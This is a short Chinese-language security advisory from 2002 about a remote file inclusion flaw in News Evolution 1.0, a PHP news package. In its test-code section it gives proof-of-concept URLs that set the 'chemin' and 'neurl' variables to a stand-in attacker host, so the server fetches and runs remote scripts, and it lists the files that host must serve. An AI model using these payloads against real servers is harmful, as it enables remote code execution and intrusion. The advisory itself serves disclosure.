News Evolution包含未定义变量造成远程执行命令漏洞发布时间:2002-12-08 更新时间:2002-12-08 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:6260 受影响系统 PHP Evolution News Evolution 1.0详细描述 News Evolution是一个免费、开放源码的新闻组软件包,用PHP实现,可运行于Unix/Linux类平台下。软件包中的aff_news.php脚本存在漏洞,当把chemin变量指向一个任意远程链接并与aff_news.php脚本一起提交给服务器后,服务器会执行链接指向脚本中的命令。 测试代码 http://example.com/aff_news.php?chemin=http://example.org/ with http://example.org/config.php http://example.org/functions.inc.php http://example.org/options.inc.php http://example.com/screen.php?neurl=http://example.org with http://example.org/admin/cfg/configsql.inc.php http://example.org/admin/cfg/configscreen.inc.php http://example.org/admin/cfg/configsite.inc.php http://example.org/admin/cfg/configtache.inc.php http://example.org/admin/fonctions/fctscr.php http://example.org/admin/fonctions/fctadmin.php http://example.org/admin/fonctions/fctform.php http://example.org/admin/modules/cache.php 解决方案 厂商还未提供补丁。 相关信息 "Frog Man" <leseulfrog@hotmail.com> |
